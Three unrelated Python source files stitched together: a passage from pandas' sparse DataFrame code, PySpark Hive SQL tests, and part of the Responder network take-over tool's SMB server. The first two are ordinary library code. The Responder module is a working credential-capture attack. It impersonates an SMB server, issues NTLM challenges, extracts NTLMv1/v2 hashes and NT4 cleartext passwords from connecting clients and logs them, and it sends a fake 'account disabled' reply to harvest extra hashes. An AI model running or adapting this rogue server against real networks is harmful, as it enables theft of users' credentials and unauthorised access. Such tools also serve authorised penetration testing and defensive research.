return x
this = self.rename(columns=lrenamer)
other = other.rename(columns=rrenamer)
else:
this = self
return this, other
def transpose(self, *args, **kwargs):
"""
Returns a DataFrame with the rows/columns switched.
"""
nv.validate_transpose(args, kwargs)
return self._constructor(
self.values.T, index=self.columns, columns=self.index,
default_fill_value=self._default_fill_value,
default_kind=self._default_kind).__finalize__(self)
T = property(transpose)
@Appender(DataFrame.count.__doc__)
def count(self, axis=0, **kwds):
if axis is None:
axis = self._stat_axis_number
return self.apply(lambda x: x.count(), axis=axis)
def cumsum(self, axis=0, *args, **kwargs):
"""
Return SparseDataFrame of cumulative sums over requested axis.
Parameters
----------
axis : {0, 1}
0 for row-wise, 1 for column-wise
Returns
-------
y : SparseDataFrame
"""
nv.validate_cumsum(args, kwargs)
if axis is None:
axis = self._stat_axis_number
return self.apply(lambda x: x.cumsum(), axis=axis)
@Appender(generic._shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return self._apply_columns(lambda x: x.isna())
isnull = isna
@Appender(generic._shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return self._apply_columns(lambda x: x.notna())
notnull = notna
def apply(self, func, axis=0, broadcast=None, reduce=None,
result_type=None):
"""
Analogous to DataFrame.apply, for SparseDataFrame
Parameters
----------
func : function
Function to apply to each column
axis : {0, 1, 'index', 'columns'}
broadcast : bool, default False
For aggregation functions, return object of same size with values
propagated
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='broadcast'.
reduce : boolean or None, default None
Try to apply reduction procedures. If the DataFrame is empty,
apply will use reduce to determine whether the result should be a
Series or a DataFrame. If reduce is None (the default), apply's
return value will be guessed by calling func on an empty Series (note:
while guessing, exceptions raised by func will be ignored). If
reduce is True a Series will always be returned, and if False a
DataFrame will always be returned.
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='reduce'.
result_type : {'expand', 'reduce', 'broadcast', None}
These only act when axis=1 (columns):
* 'expand' : list-like results will be turned into columns.
* 'reduce' : return a Series if possible rather than expanding
list-like results. This is the opposite to 'expand'.
* 'broadcast' : results will be broadcast to the original shape
of the frame, the original index & columns will be retained.
The default behaviour (None) depends on the return value of the
applied function: list-like results will be returned as a Series
of those. However if the apply function returns a Series these
are expanded to columns.
.. versionadded:: 0.23.0
Returns
-------
applied : Series or SparseDataFrame
"""
if not len(self.columns):
return self
axis = self._get_axis_number(axis)
if isinstance(func, np.ufunc):
new_series = {}
for k, v in compat.iteritems(self):
applied = func(v)
applied.fill_value = func(v.fill_value)
new_series[k] = applied
return self._constructor(
new_series, index=self.index, columns=self.columns,
default_fill_value=self._default_fill_value,
default_kind=self._default_kind).__finalize__(self)
from pandas.core.apply import frame_apply
op = frame_apply(self,
func=func,
axis=axis,
reduce=reduce,
broadcast=broadcast,
result_type=result_type)
return op.get_result()
def applymap(self, func):
"""
Apply a function to a DataFrame that is intended to operate
elementwise, i.e. like doing map(func, series) for each series in the
DataFrame
Parameters
----------
func : function
Python function, returns a single value from a single value
Returns
-------
applied : DataFrame
"""
return self.apply(lambda x: lmap(func, x))
def to_manager(sdf, columns, index):
""" create and return the block manager from a dataframe of series,
columns, index
"""
# from BlockManager perspective
axes = [ensure_index(columns), ensure_index(index)]
return create_block_manager_from_arrays(
[sdf[c] for c in columns], columns, axes)
def stack_sparse_frame(frame):
"""
Only makes sense when fill_value is NaN
"""
lengths = [s.sp_index.npoints for _, s in compat.iteritems(frame)]
nobs = sum(lengths)
# this is pretty fast
minor_codes = np.repeat(np.arange(len(frame.columns)), lengths)
inds_to_concat = []
vals_to_concat = []
# TODO: Figure out whether this can be reached.
# I think this currently can't be reached because you can't build a
# SparseDataFrame with a non-np.NaN fill value (fails earlier).
for _, series in compat.iteritems(frame):
if not np.isnan(series.fill_value):
raise TypeError('This routine assumes NaN fill value')
int_index = series.sp_index.to_int_index()
inds_to_concat.append(int_index.indices)
vals_to_concat.append(series.sp_values)
major_codes = np.concatenate(inds_to_concat)
stacked_values = np.concatenate(vals_to_concat)
index = MultiIndex(levels=[frame.index, frame.columns],
codes=[major_codes, minor_codes],
verify_integrity=False)
lp = DataFrame(stacked_values.reshape((nobs, 1)), index=index,
columns=['foo'])
return lp.sort_index(level=0)
def homogenize(series_dict):
"""
Conform a set of SparseSeries (with NaN fill_value) to a common SparseIndex
corresponding to the locations where they all have data
Parameters
----------
series_dict : dict or DataFrame
Notes
-----
Using the dumbest algorithm I could think of. Should put some more thought
into this
Returns
-------
homogenized : dict of SparseSeries
"""
index = None
need_reindex = False
for _, series in compat.iteritems(series_dict):
if not np.isnan(series.fill_value):
raise TypeError('this method is only valid with NaN fill values')
if index is None:
index = series.sp_index
elif not series.sp_index.equals(index):
need_reindex = True
index = index.intersect(series.sp_index)
if need_reindex:
output = {}
for name, series in compat.iteritems(series_dict):
if not series.sp_index.equals(index):
series = series.sparse_reindex(index)
output[name] = series
else:
output = series_dict
return output
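# Illustrative sketch (not part of the original module): conforming two NaN-filled
# SparseSeries to their common SparseIndex with ``homogenize``.
def _homogenize_demo():
    s1 = SparseSeries([1.0, np.nan, 3.0])
    s2 = SparseSeries([np.nan, 2.0, 3.0])
    return homogenize({'a': s1, 'b': s2})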
# use unaccelerated ops for sparse objects
ops.add_flex_arithmetic_methods(SparseDataFrame)
ops.add_special_arithmetic_methods(SparseDataFrame)
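# Illustrative usage sketch (not part of the original module): building a small
# SparseDataFrame from a dense ndarray and inspecting its density; ``to_coo``
# additionally assumes scipy is installed.
def _sparse_frame_demo():
    arr = np.array([[0.0, np.nan], [1.0, np.nan]])
    sdf = SparseDataFrame(arr, columns=['a', 'b'], default_fill_value=np.nan)
    return sdf.density, sdf.to_coo()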
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import sys
import tempfile
import unittest
try:
from importlib import reload # Python 3.4+ only.
except ImportError:
# Otherwise, we will stick to Python 2's built-in reload.
pass
import py4j
from pyspark import HiveContext, Row
from pyspark.sql.types import *
from pyspark.sql.window import Window
from pyspark.testing.utils import ReusedPySparkTestCase
class HiveContextSQLTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
cls.hive_available = True
try:
cls.sc._jvm.org.apache.hadoop.hive.conf.HiveConf()
except py4j.protocol.Py4JError:
cls.hive_available = False
except TypeError:
cls.hive_available = False
os.unlink(cls.tempdir.name)
if cls.hive_available:
cls.spark = HiveContext._createForTesting(cls.sc)
cls.testData = [Row(key=i, value=str(i)) for i in range(100)]
cls.df = cls.sc.parallelize(cls.testData).toDF()
def setUp(self):
if not self.hive_available:
self.skipTest("Hive is not available.")
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name, ignore_errors=True)
def test_save_and_load_table(self):
df = self.df
tmpPath = tempfile.mkdtemp()
shutil.rmtree(tmpPath)
df.write.saveAsTable("savedJsonTable", "json", "append", path=tmpPath)
actual = self.spark.createExternalTable("externalJsonTable", tmpPath, "json")
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE externalJsonTable")
df.write.saveAsTable("savedJsonTable", "json", "overwrite", path=tmpPath)
schema = StructType([StructField("value", StringType(), True)])
actual = self.spark.createExternalTable("externalJsonTable", source="json",
schema=schema, path=tmpPath,
noUse="this options will not be used")
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.select("value").collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.select("value").collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE savedJsonTable")
self.spark.sql("DROP TABLE externalJsonTable")
defaultDataSourceName = self.spark.getConf("spark.sql.sources.default",
"org.apache.spark.sql.parquet")
self.spark.sql("SET spark.sql.sources.default=org.apache.spark.sql.json")
df.write.saveAsTable("savedJsonTable", path=tmpPath, mode="overwrite")
actual = self.spark.createExternalTable("externalJsonTable", path=tmpPath)
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE savedJsonTable")
self.spark.sql("DROP TABLE externalJsonTable")
self.spark.sql("SET spark.sql.sources.default=" + defaultDataSourceName)
shutil.rmtree(tmpPath)
def test_window_functions(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
w = Window.partitionBy("value").orderBy("key")
from pyspark.sql import functions as F
sel = df.select(df.value, df.key,
F.max("key").over(w.rowsBetween(0, 1)),
F.min("key").over(w.rowsBetween(0, 1)),
F.count("key").over(w.rowsBetween(float('-inf'), float('inf'))),
F.row_number().over(w),
F.rank().over(w),
F.dense_rank().over(w),
F.ntile(2).over(w))
rs = sorted(sel.collect())
expected = [
("1", 1, 1, 1, 1, 1, 1, 1, 1),
("2", 1, 1, 1, 3, 1, 1, 1, 1),
("2", 1, 2, 1, 3, 2, 1, 1, 1),
("2", 2, 2, 2, 3, 3, 3, 2, 2)
]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_window_functions_without_partitionBy(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
w = Window.orderBy("key", df.value)
from pyspark.sql import functions as F
sel = df.select(df.value, df.key,
F.max("key").over(w.rowsBetween(0, 1)),
F.min("key").over(w.rowsBetween(0, 1)),
F.count("key").over(w.rowsBetween(float('-inf'), float('inf'))),
F.row_number().over(w),
F.rank().over(w),
F.dense_rank().over(w),
F.ntile(2).over(w))
rs = sorted(sel.collect())
expected = [
("1", 1, 1, 1, 4, 1, 1, 1, 1),
("2", 1, 1, 1, 4, 2, 2, 2, 1),
("2", 1, 2, 1, 4, 3, 2, 2, 2),
("2", 2, 2, 2, 4, 4, 4, 3, 2)
]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_window_functions_cumulative_sum(self):
df = self.spark.createDataFrame([("one", 1), ("two", 2)], ["key", "value"])
from pyspark.sql import functions as F
# Test cumulative sum
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.unboundedPreceding, 0)))
rs = sorted(sel.collect())
expected = [("one", 1), ("two", 3)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
# Test boundary values less than JVM's Long.MinValue and make sure we don't overflow
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.unboundedPreceding - 1, 0)))
rs = sorted(sel.collect())
expected = [("one", 1), ("two", 3)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
# Test boundary values greater than JVM's Long.MaxValue and make sure we don't overflow
frame_end = Window.unboundedFollowing + 1
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.currentRow, frame_end)))
rs = sorted(sel.collect())
expected = [("one", 3), ("two", 2)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
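# Illustrative sketch (not part of the original test suite): the cumulative-sum window
# frame exercised above, written as a standalone helper against an existing
# SparkSession ``spark``.
def _cumulative_sum_example(spark):
    from pyspark.sql import functions as F
    df = spark.createDataFrame([("one", 1), ("two", 2)], ["key", "value"])
    w = Window.orderBy("key").rowsBetween(Window.unboundedPreceding, Window.currentRow)
    return df.select(df.key, F.sum(df.value).over(w)).collect()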
def test_collect_functions(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
from pyspark.sql import functions
self.assertEqual(
sorted(df.select(functions.collect_set(df.key).alias('r')).collect()[0].r),
[1, 2])
self.assertEqual(
sorted(df.select(functions.collect_list(df.key).alias('r')).collect()[0].r),
[1, 1, 1, 2])
self.assertEqual(
sorted(df.select(functions.collect_set(df.value).alias('r')).collect()[0].r),
["1", "2"])
self.assertEqual(
sorted(df.select(functions.collect_list(df.value).alias('r')).collect()[0].r),
["1", "2", "2", "2"])
def test_limit_and_take(self):
df = self.spark.range(1, 1000, numPartitions=10)
def assert_runs_only_one_job_stage_and_task(job_group_name, f):
tracker = self.sc.statusTracker()
self.sc.setJobGroup(job_group_name, description="")
f()
jobs = tracker.getJobIdsForGroup(job_group_name)
self.assertEqual(1, len(jobs))
stages = tracker.getJobInfo(jobs[0]).stageIds
self.assertEqual(1, len(stages))
self.assertEqual(1, tracker.getStageInfo(stages[0]).numTasks)
# Regression test for SPARK-10731: take should delegate to Scala implementation
assert_runs_only_one_job_stage_and_task("take", lambda: df.take(1))
# Regression test for SPARK-17514: limit(n).collect() should perform the same as take(n)
assert_runs_only_one_job_stage_and_task("collect_limit", lambda: df.limit(1).collect())
def test_datetime_functions(self):
from pyspark.sql import functions
from datetime import date
df = self.spark.range(1).selectExpr("'2017-01-22' as dateCol")
parse_result = df.select(functions.to_date(functions.col("dateCol"))).first()
self.assertEquals(date(2017, 1, 22), parse_result['to_date(`dateCol`)'])
def test_unbounded_frames(self):
from pyspark.sql import functions as F
from pyspark.sql import window
df = self.spark.range(0, 3)
def rows_frame_match():
return "ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING" in df.select(
F.count("*").over(window.Window.rowsBetween(-sys.maxsize, sys.maxsize))
).columns[0]
def range_frame_match():
return "RANGE BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING" in df.select(
F.count("*").over(window.Window.rangeBetween(-sys.maxsize, sys.maxsize))
).columns[0]
for new_maxsize in [2 ** 31 - 1, 2 ** 63 - 1, 2 ** 127 - 1]:
old_maxsize = sys.maxsize
sys.maxsize = new_maxsize
try:
# Manually reload window module to use monkey-patched sys.maxsize.
reload(window)
self.assertTrue(rows_frame_match())
self.assertTrue(range_frame_match())
finally:
sys.maxsize = old_maxsize
reload(window)
if __name__ == "__main__":
from pyspark.sql.tests.test_context import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
|
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: [email protected]
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from random import randrange
from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data
from SocketServer import BaseRequestHandler
from utils import *
import struct
import re
def Is_Anonymous(data): # Detect if SMB auth was Anonymous
SecBlobLen = struct.unpack('<H',data[51:53])[0]
if SecBlobLen < 260:
LMhashLen = struct.unpack('<H',data[89:91])[0]
return LMhashLen in [0, 1]
elif SecBlobLen > 260:
LMhashLen = struct.unpack('<H',data[93:95])[0]
return LMhashLen in [0, 1]
def Is_LMNT_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
return LMhashLen in [0, 1]
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(len(Dialect)):
if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00'
def midcalc(data): #Set MID SMB Header field.
return data[34:36]
def uidcalc(data): #Set UID SMB Header field.
return data[32:34]
def pidcalc(data): #Set PID SMB Header field.
pack=data[30:32]
return pack
def tidcalc(data): #Set TID SMB Header field.
pack=data[28:30]
return pack
def ParseShare(data):
packet = data[:]
a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
if a:
print text("[SMB] Requested Share : %s" % a.group(0).decode('UTF-16LE'))
def GrabMessageID(data):
Messageid = data[28:36]
return Messageid
def GrabCreditRequested(data):
CreditsRequested = data[18:20]
if CreditsRequested == "\x00\x00":
CreditsRequested = "\x01\x00"
else:
CreditsRequested = data[18:20]
return CreditsRequested
def GrabCreditCharged(data):
CreditCharged = data[10:12]
return CreditCharged
def GrabSessionID(data):
SessionID = data[44:52]
return SessionID
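# Illustrative sketch (not part of the original module): the recurring
# struct.unpack('<H', ...) calls below read a little-endian unsigned 16-bit
# length/offset field starting at a given byte offset.
def _read_le_ushort(data, offset):
    return struct.unpack('<H', data[offset:offset + 2])[0]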
def ParseSMBHash(data,client, Challenge): #Parse SMB NTLMSSP v1/v2
SSPIStart = data.find('NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, Challenge.encode('hex'))
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
def ParseSMB2NTLMv2Hash(data,client, Challenge): #Parse SMB NTLMv2
SSPIStart = data[113:]
data = data[113:]
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[22:24])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[30:32])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',data[38:40])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMBv2',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
def ParseLMNTHash(data, client, Challenge): # Parse SMB NTLMv1/v2
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
if NthashLen > 25:
FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
LmHash = FullHash[:32].upper()
NtHash = FullHash[32:].upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), LmHash, NtHash)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
if NthashLen == 24:
NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
LmHash = data[65:65+LMhashLen].encode('hex').upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, Challenge.encode('hex'))
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
def IsNT4ClearTxt(data, client):
HeadLen = 36
if data[14:16] == "\x03\x80":
SmbData = data[HeadLen+14:]
WordCount = data[HeadLen]
ChainedCmdOffset = data[HeadLen+1]
if ChainedCmdOffset == "\x75":
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
def handle(self):
try:
self.ntry = 0
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
Challenge = RandomChallenge()
if not data:
break
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
##Negotiate proto answer SMBv2.
if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data):
head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
t = SMB2NegoAns()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 1 answer SMBv2.
if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
head = SMB2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
t = SMB2NegoAns(Dialect="\x10\x02")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 2 answer SMBv2.
if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0")
t = SMB2Session1Data(NTLMSSPNtServerChallenge=Challenge)
t.calculate()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 3 answer SMBv2.
if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
ParseSMB2NTLMv2Hash(data, self.client_address[0], Challenge)
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
t = SMB2Session2Data()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
# Negotiate Protocol Response smbv1
if data[8:10] == "\x72\x00" and data[4:5] == "\xff" and re.search("SMB 2.\?\?\?", data) == None:
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x73\x00" and data[4:5] == "\xff": # Session Setup AndX Request smbv1
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
else:
Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge)
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x73\x00" and data[4:5] == "\xff": # STATUS_SUCCESS
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data,self.client_address[0], Challenge)
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
# Send ACCOUNT_DISABLED to get multiple hashes if there are any
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
self.ntry += 1
continue
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x75\x00" and data[4:5] == "\xff": # Tree Connect AndX Request
ParseShare(data)
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x71\x00" and data[4:5] == "\xff": #Tree Disconnect
Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\xa2\x00" and data[4:5] == "\xff": #NT_CREATE Access Denied.
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x25\x00" and data[4:5] == "\xff": # Trans2 Access Denied.
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
